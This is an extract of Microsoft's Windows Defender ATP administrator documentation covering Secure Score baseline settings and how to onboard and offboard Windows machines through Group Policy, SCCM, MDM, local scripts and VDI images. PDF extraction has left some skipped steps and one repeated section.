Real-time protection is on
Potentially Unwanted Application (PUA) protection is enabled
NOTE
For the Windows Defender Antivirus properties to show, you'll need to ensure that the Windows Defender Antivirus Cloud-
based protection is properly configured on the machine.
Fix antivirus reporting

This recommendation is displayed when the Windows Defender Antivirus is not properly configured to
report its health state. For more information on fixing the reporting, see Configure and validate network
connections.
Turn on antivirus
Update antivirus Security intelligence
Turn on real-time protection
Turn on PUA protection
For more information, see Configure Windows Defender Antivirus.
OS security updates optimization
This tile shows you the exact number of machines that require the latest security updates. It also shows machines
that are running on the latest Windows Insider preview build and serves as a reminder to ensure that users
should run the latest builds.
IMPORTANT
Install the latest security updates
The Windows Defender ATP service relies on sensor data collection to determine the security state of a
machine. The service will not be able to determine the security state of machines that are not reporting
sensor data properly. Therefore, it's important to ensure that sensor data collection is working properly.
For more information, see Windows Update Troubleshooter.
Windows Defender Exploit Guard (Windows Defender EG ) optimization
This tile shows you a specific list of actions you must apply on machines so that the minimum baseline
configuration setting for Windows Defender EG is fulfilled. When endpoints are configured according to the
baseline you'll be able to see Windows Defender EG events on the Windows Defender ATP Machine timeline.
IMPORTANT
This security control is only applicable for machines with Windows 10, version 1709 or later.
Minimum baseline configuration setting for Windows Defender EG:

Machines are considered "well configured" for Windows Defender EG if the following requirements are met:
System level protection settings are configured correctly
Attack Surface Reduction rules are configured correctly
Controlled Folder Access setting is configured correctly
Sy st e m l e v e l p r o t e c t i o n :
The following system level configuration settings must be set to On or Force On:
1. Control Flow Guard
2. Data Execution Prevention (DEP )
3. Randomize memory allocations (Bottom-up ASLR )
4. Validate exception chains (SEHOP )
5. Validate heap integrity
NOTE
The setting Force randomization for images (Mandatory ASLR) is currently excluded from the baseline. Consider
configuring Force randomization for images (Mandatory ASLR) to On or Force On for better protection.
A t t a c k Su r fa c e R e d u c t i o n (A SR ) r u l e s:
The following ASR rules must be configured to Block mode:
RULE DESCRIPTION GUIDS
Block executable content from email client and webmail BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block Office applications from creating child processes D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block Office applications from creating executable content 3B576869-A4EC-4529-8536-B80A7769E899
Impede JavaScript and VBScript to launch executables D3E037E1-3EB8-44C8-A917-57927947596D
Block execution of potentially obfuscated scripts 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC
Block Win32 imports from Macro code in Office 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B
NOTE
The setting Block Office applications from injecting into other processes with GUID 75668C1F-73B5-4CF0-BB93-
3ECF5CB7CC84 is excluded from the baseline. Consider enabling this rule in Audit or Block mode for better protection.
C o n t r o l l e d F o l d e r A c c e ss
The Controlled Folder Access setting must be configured to Audit mode or Enabled.
NOTE
Audit mode, allows you to see audit events in the Windows Defender ATP Machine timeline however it does not block
suspicious applications. Consider enabling Controlled Folder Access for better protection.
Turn on all system-level Exploit Protection settings
Set all ASR rules to enabled or audit mode
Turn on Controlled Folder Access
Turn on Windows Defender Antivirus on compatible machines
For more information, see Windows Defender Exploit Guard.
Windows Defender Application Guard (Windows Defender AG ) optimization
configuration setting for Windows Defender AG is fulfilled. When endpoints are configured according to the
baseline you'll be able to see Windows Defender AG events on the Windows Defender ATP Machine timeline.
IMPORTANT
Minimum baseline configuration setting for Windows Defender AG:

Machines are considered "well configured" for Windows Defender AG if the following requirements are met:
Hardware and software prerequisites are met
Windows Defender AG is turned on compatible machines
Managed mode is turned on
Ensure hardware and software prerequisites are met
NOTE
This improvement item does not contribute to the security score in itself because it's not a prerequisite for Windows
Defender AG. It gives an indication of a potential reason why Windows Defender AG is not turned on.
Turn on Windows Defender AG on compatible machines

Turn on managed mode
For more information, see Windows Defender Application Guard overview.
Windows Defender SmartScreen optimization
configuration setting for Windows Defender SmartScreen is fulfilled.
WARNING
Data collected by Windows Defender SmartScreen might be stored and processed outside of the storage location you have
selected for your Windows Defender ATP data.
IMPORTANT
Minimum baseline configuration setting for Windows Defender SmartScreen:

The following settings must be configured with the following settings:
Check apps and files: Warn or Block
SmartScreen for Microsoft Edge: Warn or Block
SmartScreen for Microsoft store apps: Warn or Off
Set Check app and files to Warn or Block
Set SmartScreen for Microsoft Edge to Warn or Block
Set SmartScreen for Microsoft store apps to Warn or Off
For more information, see Windows Defender SmartScreen.
Windows Defender Firewall optimization
For a machine to be considered "well configured", Windows Defender Firewall must be turned on and enabled for
all profiles and inbound connections are blocked by default. This tile shows you a specific list of actions you must
apply on endpoints so that the minimum baseline configuration setting for Windows Defender Firewall is fulfilled.
IMPORTANT
Minimum baseline configuration setting for Windows Defender Firewall

Windows Defender Firewall is turned on for all network connections
Secure domain profile by enabling Windows Defender Firewall and ensure that Inbound connections is set to
Blocked
Secure private profile by enabling Windows Defender Firewall and ensure that Inbound connections is set to
Blocked
Secure public profile is configured by enabling Windows Defender Firewall and ensure that Inbound
connections is set to Blocked
For more information on Windows Defender Firewall settings, see Planning settings for a basic firewall policy.
NOTE
If Windows Defender Firewall is not your primary firewall, consider excluding it from the security score calculations and make
sure that your third-party firewall is configured in a securely.
Turn on firewall
Secure domain profile
Secure private profile
Secure public profile
Verify secure configuration of third-party firewall
For more information, see Windows Defender Firewall with Advanced Security.
BitLocker optimization
configuration setting for BitLocker is fulfilled.
IMPORTANT
Minimum baseline configuration setting for BitLocker

Ensure all supported drives are encrypted
Ensure that all suspended protection on drives resume protection
Ensure that drives are compatible
Encrypt all supported drives
Resume protection on all drives
Ensure drive compatibility
For more information, see Bitlocker.
Windows Defender Credential Guard optimization
configuration setting for Windows Defender Credential Guard is fulfilled.
IMPORTANT
Minimum baseline configuration setting for Windows Defender Credential Guard:

Machines are considered "well configured" for Windows Defender Credential Guard if the following requirements
are met:
Hardware and software prerequisites are met
Windows Defender Credential Guard is turned on compatible machines
Ensure hardware and software prerequisites are met
Turn on Credential Guard
For more information, see Manage Windows Defender Credential Guard.
Related topics
Overview of Secure score
Onboard machines to the Windows Defender ATP
service
Applies to:
You need to turn on the sensor to give visibility within Windows Defender ATP.
For more information, see Onboard your Windows 10 machines to Windows Defender ATP.
IMPORTANT
Microsoft 365 Enterprise E5 which includes Windows 10 Enterprise E5
For more information, see Windows 10 Licensing.
Hardware and software requirements

Supported Windows versions
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows 8.1 Enterprise
Windows 8.1 Pro
Windows 10 Enterprise
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education
Windows server
Windows Server 2016
Windows Server 2016, version 1803
Windows Server 2019
Machines on your network must be running one of these editions.
The hardware requirements for Windows Defender ATP on machines is the same as those for the supported
editions.
NOTE
Machines that are running mobile versions of Windows are not supported.
Other supported operating systems

macOSX
Linux
NOTE
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP for the
integration to work.
Network and data storage and configuration requirements

When you run the onboarding wizard for the first time, you must choose where your Windows Defender Advanced
Threat Protection-related information is stored: in the European Union, the United Kingdom, or the United States
datacenter.
NOTE
You cannot change your data storage location after the first-time setup.
Review the Windows Defender ATP data storage and privacy for more information on where and how Microsoft stores
your data.
Diagnostic data settings

You must ensure that the diagnostic data service is enabled on all the machines in your organization. By default,
this service is enabled, but it's good practice to check to ensure that you'll get sensor data from them.
Use the command line to check the Windows 10 diagnostic data service startup type:
1. Open an elevated command-line prompt on the machine:
b. Right-click Command prompt and select Run as administrator.
sc qc diagtrack
If the service is enabled, then the result should look like the following screenshot:
If the START_TYPE is not set to AUTO_START, then you'll need to set the service to automatically start.
Use the command line to set the Windows 10 diagnostic data service to automatically start:
1. Open an elevated command-line prompt on the endpoint:
sc config diagtrack start=auto
3. A success message is displayed. Verify the change by entering the following command, and press Enter:
sc qc diagtrack
Internet connectivity
Internet connectivity on machines is required either directly or through proxy.
The Windows Defender ATP sensor can utilize a daily average bandwidth of 5MB to communicate with the
Windows Defender ATP cloud service and report cyber data. One-off activities such as file uploads and
investigation package collection are not included in this daily average bandwidth.
For more information on additional proxy configuration settings see, Configure machine proxy and Internet
connectivity settings .
Before you onboard machines, the diagnostic data service must be enabled. The service is enabled by default in
Windows 10.
Windows Defender Antivirus configuration requirement

The Windows Defender ATP agent depends on the ability of Windows Defender Antivirus to scan files and provide
information about them.
You must configure Security intelligence updates on the Windows Defender ATP machines whether Windows
Defender Antivirus is the active antimalware or not. For more information, see Manage Windows Defender
Antivirus updates and apply baselines.
When Windows Defender Antivirus is not the active antimalware in your organization and you use the Windows
Defender ATP service, Windows Defender Antivirus goes on passive mode. If your organization has disabled
Windows Defender Antivirus through group policy or other methods, machines that are onboarded to Windows
Defender ATP must be excluded from this group policy.
If you are onboarding servers and Windows Defender Antivirus is not the active antimalware on your servers, you
shouldn't uninstall Windows Defender Antivirus. You'll need to configure it to run on passive mode. For more
information, see Onboard servers.
For more information, see Windows Defender Antivirus compatibility.
Windows Defender Antivirus Early Launch Antimalware (ELAM) driver is

enabled
If you're running Windows Defender Antivirus as the primary antimalware product on your machines, the
Windows Defender ATP agent will successfully onboard.
If you're running a third-party antimalware client and use Mobile Device Management solutions or System Center
Configuration Manager (current branch) version 1606, you'll need to ensure that the Windows Defender Antivirus
ELAM driver is enabled. For more information, see Ensure that Windows Defender Antivirus is not disabled by
policy.
In this section
TOPIC DESCRIPTION
Onboard previous versions of Windows Onboard Windows 7 and Windows 8.1 machines to Windows
Defender ATP.
Onboard Windows 10 machines You'll need to onboard machines for it to report to the
Windows Defender ATP service. Learn about the tools and
methods you can use to configure machines in your
enterprise.
Onboard servers Onboard Windows Server 2012 R2 and Windows Server 2016
to Windows Defender ATP
Onboard non-Windows machines Windows Defender ATP provides a centralized security

operations experience for Windows as well as non-Windows
platforms. You'll be able to see alerts from various supported
operating systems (OS) in Windows Defender Security Center
and better protect your organization's network. This
experience leverages on a third-party security products' sensor
data.
Run a detection test on a newly onboarded machine Run a script on a newly onboarded machine to verify that it is
properly reporting to the Windows Defender ATP service.
Configure proxy and Internet settings Enable communication with the Windows Defender ATP cloud
service by configuring the proxy and Internet connectivity
settings.
Troubleshoot onboarding issues Learn about resolving issues that might arise during
onboarding.

Applies to:
Windows 7 SP1 Pro
Windows 8.1 Pro
Windows Defender ATP extends support to include down-level operating systems, providing advanced attack
detection and investigation capabilities on supported Windows versions.
IMPORTANT
This capability is currently in preview. You'll need to turn on the preview features to take advantage of this feature. For more
information, see Preview features.
To onboard down-level Windows client endpoints to Windows Defender ATP, you'll need to:
Configure and update System Center Endpoint Protection clients.
Install and configure Microsoft Monitoring Agent (MMA) to report sensor data to Windows Defender ATP as
instructed below.
TIP
After onboarding the machine, you can choose to run a detection test to verify that it is properly onboarded to the service.
For more information, see Run a detection test on a newly onboarded Windows Defender ATP endpoint.
Configure and update System Center Endpoint Protection clients

IMPORTANT
This step is required only if your organization uses System Center Endpoint Protection (SCEP).
Windows Defender ATP integrates with System Center Endpoint Protection to provide visibility to malware
detections and to stop propagation of an attack in your organization by banning potentially malicious files or
suspected malware.
The following steps are required to enable this integration:
Install the January 2017 anti-malware platform update for Endpoint Protection clients
Configure the SCEP client Cloud Protection Service membership to the Advanced setting
Configure your network to allow connections to the Windows Defender Antivirus cloud. For more information,
see Allow connections to the Windows Defender Antivirus cloud
Install and configure Microsoft Monitoring Agent (MMA) to report
sensor data to Windows Defender ATP
Before you begin
Review the following details to verify minimum system requirements:
Install the February monthly update rollup
NOTE
Only applicable for Windows 7 SP1 Enterprise and Windows 7 SP1 Pro.
Install the Update for customer experience and diagnostic telemetry

Install either .NET framework 4.5 (or later) or KB3154518
NOTE
Only applicable for Windows 7 SP1 Enterprise and Windows 7 SP1 Pro. Don't install .NET framework 4.0.x, since it will
negate the above installation.
Meet the Azure Log Analytics agent minimum system requirements. For more information, see Collect data
from computers in you environment with Log Analytics
1. Download the agent setup file: Windows 64-bit agent or Windows 32-bit agent.
2. Obtain the workspace ID:
In the Windows Defender ATP navigation pane, select Settings > Machine management >
Onboarding
Select Windows 7 SP1 and 8.1 as the operating system
Copy the workspace ID and workspace key
3. Using the Workspace ID and Workspace key choose any of the following installation methods to install the
agent:
Manually install the agent using setup
On the Agent Setup Options page, select Connect the agent to Azure Log Analytics (OMS )
Install the agent using command line and configure the agent using a script
4. If you're using a proxy to connect to the Internet see the Configure proxy settings section.
Once completed, you should see onboarded endpoints in the portal within an hour.
Each Windows endpoint must be able to connect to the Internet using HTTPS. This connection can be direct,
using a proxy, or through the OMS Gateway.
If a proxy or firewall is blocking all traffic by default and allowing only specific domains through or HTTPS
scanning (SSL inspection) is enabled, make sure that the following URLs are white-listed to permit
communication with Windows Defender ATP service:
AGENT RESOURCE PORTS
*.oms.opinsights.azure.com 443
*.blob.core.windows.net 443
*.azure-automation.net 443
*.ods.opinsights.azure.com 443
winatp-gw-cus.microsoft.com 443
winatp-gw-eus.microsoft.com 443
winatp-gw-neu.microsoft.com 443
winatp-gw-weu.microsoft.com 443
winatp-gw-uks.microsoft.com 443
winatp-gw-ukw.microsoft.com 443
Offboard client endpoints

To offboard, you can uninstall the MMA agent from the endpoint or detach it from reporting to your Windows
Defender ATP workspace. After offboarding the agent, the endpoint will no longer send sensor data to Windows
Defender ATP.

Applies to:
Machines in your organization must be configured so that the Windows Defender ATP service can get sensor
data from them. There are various methods and deployment tools that you can use to configure the machines
in your organization.
The following deployment tools and methods are supported:
Group Policy
Mobile Device Management (including Microsoft Intune)
Local script
In this section
TOPIC DESCRIPTION
Onboard Windows 10 machines using Group Policy Use Group Policy to deploy the configuration package on
machines.
Onboard Windows 10 machines using System Center You can use either use System Center Configuration
Configuration Manager Manager (current branch) version 1606 or System Center
Configuration Manager(current branch) version 1602 or
earlier to deploy the configuration package on machines.
Onboard Windows 10 machines using Mobile Device Use Mobile Device Management tools or Microsoft Intune
Management tools to deploy the configuration package on machine.
Onboard Windows 10 machines using a local script Learn how to use the local script to deploy the configuration
package on endpoints.
Onboard non-persistent virtual desktop infrastructure (VDI) Learn how to use the configuration package to configure
machines VDI machines.

Onboard Windows 10 machines using Group Policy
Applies to:
Group Policy
NOTE
To use Group Policy (GP) updates to deploy the package, you must be on Windows Server 2008 R2 or later.
Onboard machines using Group Policy

1. Open the GP configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
downloaded from the service onboarding wizard. You can also get the package from Windows Defender
Security Center:
a. In the navigation pane, select Settings > Onboarding.
b. Select Windows 10 as the operating system.
c. In the Deployment method field, select Group policy.
d. Click Download package and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machine.
You should have a folder called OptionalParamsPolicy and the file
WindowsDefenderATPOnboardingScript.cmd.
3. Open the Group Policy Management Console (GPMC ), right-click the Group Policy Object (GPO ) you
want to configure and click Edit.
4. In the Group Policy Management Editor, go to Computer configuration, then Preferences, and
then Control panel settings.
5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab. Choose the local SYSTEM user account under
Security options.
7. Select Run whether user is logged on or not and check the Run with highest privileges check box.
8. Go to the Actions tab and click New... Ensure that Start a program is selected in the Action field. Enter
the file name and location of the shared WindowsDefenderATPOnboardingScript.cmd file.
9. Click OK and close any open GPMC windows.
TIP
After onboarding the machine, you can choose to run a detection test to verify that the machine is properly onboarded
to the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.
Additional Windows Defender ATP configuration settings

For each machine, you can state whether samples can be collected from the machine when a request is made
through Windows Defender Security Center to submit a file for deep analysis.
You can use Group Policy (GP ) to configure settings, such as settings for the sample sharing used in the deep
analysis feature.
Configure sample collection settings
1. On your GP management machine, copy the following files from the configuration package:
a. Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions
b. Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US
2. Open the Group Policy Management Console, right-click the GPO you want to configure and click Edit.
3. In the Group Policy Management Editor, go to Computer configuration.
4. Click Policies, then Administrative templates.
5. Click Windows components and then Windows Defender ATP.
6. Choose to enable or disable sample sharing from your machines.
NOTE
If you don't set a value, the default value is to enable sample collection.
Offboard machines using Group Policy

For security reasons, the package used to Offboard machines will expire 30 days after the date it was
downloaded. Expired offboarding packages sent to a machine will be rejected. When downloading an
offboarding package you will be notified of the packages expiry date and it will also be included in the package
name.
NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will
cause unpredictable collisions.
1. Get the offboarding package from Windows Defender Security Center:

a. In the navigation pane, select Settings > Offboarding.
c. In the Deployment method field, select Group policy.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machine.
You should have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY -MM -DD.cmd.
3. Open the Group Policy Management Console (GPMC ), right-click the Group Policy Object (GPO ) you
want to configure and click Edit.
4. In the Group Policy Management Editor, go to Computer configuration, then Preferences, and
then Control panel settings.
5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab. Choose the local SYSTEM user account under
Security options.
7. Select Run whether user is logged on or not and check the Run with highest privileges check-box.
8. Go to the Actions tab and click New.... Ensure that Start a program is selected in the Action field.
Enter the file name and location of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY -MM -DD.cmd file.
9. Click OK and close any open GPMC windows.
IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference
to any alerts it has had will be retained for up to 6 months.
Monitor machine configuration

With Group Policy there isn’t an option to monitor deployment of policies on the machines. Monitoring can be
done directly on the portal, or by using the different deployment tools.
Monitor machines using the portal

1. Go to Windows Defender Security Center.
2. Click Machines list.
3. Verify that machines are appearing.
NOTE
It can take several days for machines to start showing on the Machines list. This includes the time it takes for the policies
to be distributed to the machine, the time it takes before the user logs on, and the time it takes for the endpoint to start
reporting.
Related topics
Onboard Windows 10 machines using System Center Configuration Manager
Onboard Windows 10 machines using Mobile Device Management tools
Onboard Windows 10 machines using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) machines
Run a detection test on a newly onboarded Windows Defender ATP machines
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Onboard Windows 10 machines using System Center
Configuration Manager
Applies to:
System Center 2012 Configuration Manager or later versions
Onboard Windows 10 machines using System Center Configuration

Manager (current branch) version 1606
System Center Configuration Manager (SCCM ) (current branch) version 1606, has UI integrated support for
configuring and managing Windows Defender ATP on machines. For more information, see Support for Windows
Defender Advanced Threat Protection service.
NOTE
If you’re using SCCM client version 1606 with server version 1610 or above, you must upgrade the client version to match
the server version.
Onboard Windows 10 machines using System Center Configuration

Manager earlier versions
You can use existing System Center Configuration Manager functionality to create a policy to configure your
machines. This is supported in the following System Center Configuration Manager versions:
System Center 2012 Configuration Manager
System Center 2012 R2 Configuration Manager
System Center Configuration Manager (current branch), version 1511
System Center Configuration Manager (current branch), version 1602
Onboard machines using System Center Configuration Manager
1. Open the SCCM configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
Security Center:
c. In the Deployment method field, select System Center Configuration Manager 2012/2012
R2/1511/1602.
d. Click Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network
administrators who will deploy the package. You should have a file named
WindowsDefenderATPOnboardingScript.cmd.
3. Deploy the package by following the steps in the Packages and Programs in Configuration Manager topic.
a. Choose a predefined device collection to deploy the package to.
NOTE
Windows Defender ATP doesn't support onboarding during the Out-Of-Box Experience (OOBE) phase. Make sure users
complete OOBE after running Windows installation or upgrading.
TIP
After onboarding the machine, you can choose to run a detection test to verify that an machine is properly onboarded to
the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.

For each machine, you can set a configuration value to state whether samples can be collected from the machine
when a request is made through Windows Defender Security Center to submit a file for deep analysis.
You can set a compliance rule for configuration item in System Center Configuration Manager to change the
sample share setting on a machine. This rule should be a remediating compliance rule configuration item that sets
the value of a registry key on targeted machines to make sure they’re complaint.
The configuration is set through the following registry key entry:
Path: “HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection”

Name: "AllowSampleCollection"
Value: 0 or 1
Where:
Key type is a D -WORD.
Possible values are:
0 - doesn't allow sample sharing from this machine
1 - allows sharing of all file types from this machine
The default value in case the registry key doesn’t exist is 1.
For more information about System Center Configuration Manager Compliance see Get started with compliance
settings in System Center Configuration Manager.
Offboard machines using System Center Configuration Manager

For security reasons, the package used to Offboard machines will expire 30 days after the date it was downloaded.
Expired offboarding packages sent to an machine will be rejected. When downloading an offboarding package you
will be notified of the packages expiry date and it will also be included in the package name.
NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will cause
unpredictable collisions.

c. In the Deployment method field, select System Center Configuration Manager 2012/2012
R2/1511/1602.
WindowsDefenderATPOffboardingScript_valid_until_YYYY -MM -DD.cmd.
3. Deploy the package by following the steps in the Packages and Programs in Configuration Manager topic.
a. Choose a predefined device collection to deploy the package to.
IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference to
any alerts it has had will be retained for up to 6 months.

Monitoring with SCCM consists of two parts:
1. Confirming the configuration package has been correctly deployed and is running (or has successfully run)
on the machines in your network.
2. Checking that the machines are compliant with the Windows Defender ATP service (this ensures the
machine can complete the onboarding process and can continue to report data to the service).
To confirm the configuration package has been correctly deployed:
1. In the SCCM console, click Monitoring at the bottom of the navigation pane.
2. Click Overview and then Deployments.
3. Click on the deployment with the package name.
4. Review the status indicators under Completion Statistics and Content Status.
If there are failed deployments (machines with Error, Requirements Not Met, or Failed statuses), you may
need to troubleshoot the machines. For more information see, Troubleshoot Windows Defender Advanced Threat
Protection onboarding issues.
Check that the machines are compliant with the Windows Defender ATP service:
You can set a compliance rule for configuration item in System Center Configuration Manager to monitor your
deployment.
This rule should be a non-remediating compliance rule configuration item that monitors the value of a registry
key on targeted machines.
Monitor the following registry key entry:
Path: “HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status”

Name: “OnboardingState”
Value: “1”
For more information about System Center Configuration Manager Compliance see Get started with compliance
settings in System Center Configuration Manager.
Related topics
Run a detection test on a newly onboarded Windows Defender ATP machine
Onboard Windows 10 machines using Mobile Device
Management tools
Applies to:
You can use mobile device management (MDM ) solutions to configure machines. Windows Defender ATP supports
MDMs by providing OMA-URIs to create policies to manage machines.
For more information on using Windows Defender ATP CSP see, WindowsAdvancedThreatProtection CSP and
WindowsAdvancedThreatProtection DDF file.
Before you begin

If you're using Microsoft Intune, you must have the device MDM Enrolled. Otherwise, settings will not be applied
successfully.
For more information on enabling MDM with Microsoft Intune, see Setup Windows Device Management.
Onboard machines using Microsoft Intune

Follow the instructions from Intune.
NOTE
The Health Status for onboarded machines policy uses read-only properties and can't be remediated.
Configuration of diagnostic data reporting frequency is only available for machines on Windows 10, version 1703.
TIP
After onboarding the machine, you can choose to run a detection test to verify that a machine is properly onboarded to the
service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.
Offboard and monitor machines using Mobile Device Management

tools
Expired offboarding packages sent to a machine will be rejected. When downloading an offboarding package you
NOTE

c. In the Deployment method field, select Mobile Device Management / Microsoft Intune.
WindowsDefenderATP_valid_until_YYYY -MM -DD.offboarding.
3. Use the Microsoft Intune custom configuration policy to deploy the following supported OMA-URI settings.
For more information on Microsoft Intune policy settings see, Windows 10 policy settings in Microsoft
Intune.
NOTE
The Health Status for offboarded machines policy uses read-only properties and can't be remediated.
IMPORTANT
Related topics
Onboard Windows 10 machines using Mobile Device
Management tools
Applies to:
You can use mobile device management (MDM ) solutions to configure machines. Windows Defender ATP
supports MDMs by providing OMA-URIs to create policies to manage machines.
Before you begin

If you're using Microsoft Intune, you must have the device MDM Enrolled. Otherwise, settings will not be applied
successfully.
For more information on enabling MDM with Microsoft Intune, see Setup Windows Device Management.
Onboard machines using Microsoft Intune

Follow the instructions from Intune.
NOTE
The Health Status for onboarded machines policy uses read-only properties and can't be remediated.
Configuration of diagnostic data reporting frequency is only available for machines on Windows 10, version 1703.
TIP
After onboarding the machine, you can choose to run a detection test to verify that a machine is properly onboarded to the
service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP machine.
Offboard and monitor machines using Mobile Device Management

tools
Expired offboarding packages sent to a machine will be rejected. When downloading an offboarding package you
NOTE

c. In the Deployment method field, select Mobile Device Management / Microsoft Intune.
WindowsDefenderATP_valid_until_YYYY -MM -DD.offboarding.
3. Use the Microsoft Intune custom configuration policy to deploy the following supported OMA-URI
settings. For more information on Microsoft Intune policy settings see, Windows 10 policy settings in
Microsoft Intune.
NOTE
The Health Status for offboarded machines policy uses read-only properties and can't be remediated.
IMPORTANT
Related topics
Applies to:
You can also manually onboard individual machines to Windows Defender ATP. You might want to do this first
when testing the service before you commit to onboarding all machines in your network.
NOTE
The script has been optimized to be used on a limited number of machines (1-10 machines). To deploy to scale, use other
deployment options. For more information on using other deployment options, see Onboard Window 10 machines.
Onboard machines
1. Open the GP configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
Security Center:
c. In the Deployment method field, select Local Script.
2. Extract the contents of the configuration package to a location on the machine you want to onboard (for
example, the Desktop). You should have a file named WindowsDefenderATPOnboardingScript.cmd.
3. Open an elevated command-line prompt on the machine and run the script:
4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOnboardingScript.cmd
5. Press the Enter key or click OK.
For information on how you can manually validate that the machine is compliant and correctly reports sensor
data see, Troubleshoot Windows Defender Advanced Threat Protection onboarding issues.
TIP
After onboarding the machine, you can choose to run a detection test to verify that an machine is properly onboarded to
the service. For more information, see Run a detection test on a newly onboarded Windows Defender ATP endpoint.

For each machine, you can set a configuration value to state whether samples can be collected from the machine
when a request is made through Windows Defender Security Center to submit a file for deep analysis.
You can manually configure the sample sharing setting on the machine by using regedit or creating and running
a .reg file.
The configuration is set through the following registry key entry:
Path: “HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection”

Name: "AllowSampleCollection"
Value: 0 or 1
Where:
Name type is a D -WORD.
0 - doesn't allow sample sharing from this machine
1 - allows sharing of all file types from this machine
The default value in case the registry key doesn’t exist is 1.
Offboard machines using a local script

For security reasons, the package used to Offboard machines will expire 30 days after the date it was
downloaded. Expired offboarding packages sent to an machine will be rejected. When downloading an
offboarding package you will be notified of the packages expiry date and it will also be included in the package
name.
NOTE
Onboarding and offboarding policies must not be deployed on the same machine at the same time, otherwise this will
cause unpredictable collisions.

c. In the Deployment method field, select Local Script.
2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the machines.
You should have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY -MM -DD.cmd.
4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY -MM -DD.cmd
5. Press the Enter key or click OK.
IMPORTANT
Offboarding causes the machine to stop sending sensor data to the portal but data from the machine, including reference
to any alerts it has had will be retained for up to 6 months.

You can follow the different verification steps in the Troubleshoot onboarding issues to verify that the script
completed successfully and the agent is running.
Monitoring can also be done directly on the portal, or by using the different deployment tools.
Monitor machines using the portal
1. Go to Windows Defender Security Center.
2. Click Machines list.
3. Verify that machines are appearing.
Related topics
Onboard non-persistent virtual desktop
infrastructure (VDI) machines
Applies to:
Virtual desktop infrastructure (VDI) machines

Windows Defender ATP supports non-persistent VDI session onboarding. There might be associated challenges
when onboarding VDIs. The following are typical challenges for this scenario:
Instant early onboarding of a short living session
A session should be onboarded to Windows Defender ATP prior to the actual provisioning.
Machine name persistence
The machine names are typically reused for new sessions. One may ask to have them as a single
machine entry while others may prefer to have multiple entries per machine name.
You can onboard VDI machines using a single entry or multiple entries for each machine. The following steps will
guide you through onboarding VDI machines and will highlight steps for single and multiple entries.
WARNING
For environments where there are low resource configurations, the VDI boot proceedure might slow the Windows Defender
ATP sensor onboarding.
1. Open the VDI configuration package .zip file (WindowsDefenderATPOnboardingPackage.zip) that you
Security Center:
c. In the Deployment method field, select VDI onboarding scripts for non-persistent endpoints.
2. Copy the extracted files from the .zip into image under the path
golden/master
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup . You should have a folder called
WindowsDefenderATPOnboardingPackage containing the file WindowsDefenderATPOnboardingScript.cmd .
NOTE
If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be hidden.
You'll need to choose the Show hidden files and folders option from file explorer.
3. The following step is only applicable if you're implementing a single entry for each machine:
For single entry for each machine:
a. From the WindowsDefenderATPOnboardingPackage , copy the Onboard-NonPersistentMachine.ps1 file to
golden/master image to the path C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup .
NOTE
If you don't see the C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be hidden.
You'll need to choose the Show hidden files and folders option from file explorer.
4. Open a Local Group Policy Editor window and navigate to Computer Configuration > Windows
Settings > Scripts > Startup.
5. Depending on the method you'd like to implement, follow the appropriate steps:
For single entry for each machine:
Select the PowerShell Scripts tab, then click Add (Windows Explorer will open directly in the path where
you copied the onboarding script earlier). Navigate to onboarding PowerShell script
Onboard-NonPersistentMachine.ps1 .
For multiple entries for each machine:

Select the Scripts tab, then click Add (Windows Explorer will open directly in the path where you copied
the onboarding script earlier). Navigate to the onboarding bash script
WindowsDefenderATPOnboardingScript.cmd .
6. Test your solution:

a. Create a pool with one machine.
b. Logon to machine.
c. Logoff from machine.
d. Logon to machine with another user.
e. For single entry for each machine: Check only one entry in Windows Defender Security Center.
For multiple entries for each machine: Check multiple entries in Windows Defender Security Center.
7. Click Machines list on the Navigation pane.
8. Use the search function by entering the machine name and select Machine as search type.
Related topics
Onboard servers to the Windows Defender ATP
service
Applies to:
Windows Server 2016
Windows Server, version 1803
Windows Server, 2019
IMPORTANT
Windows Defender ATP extends support to also include the Windows Server operating system, providing
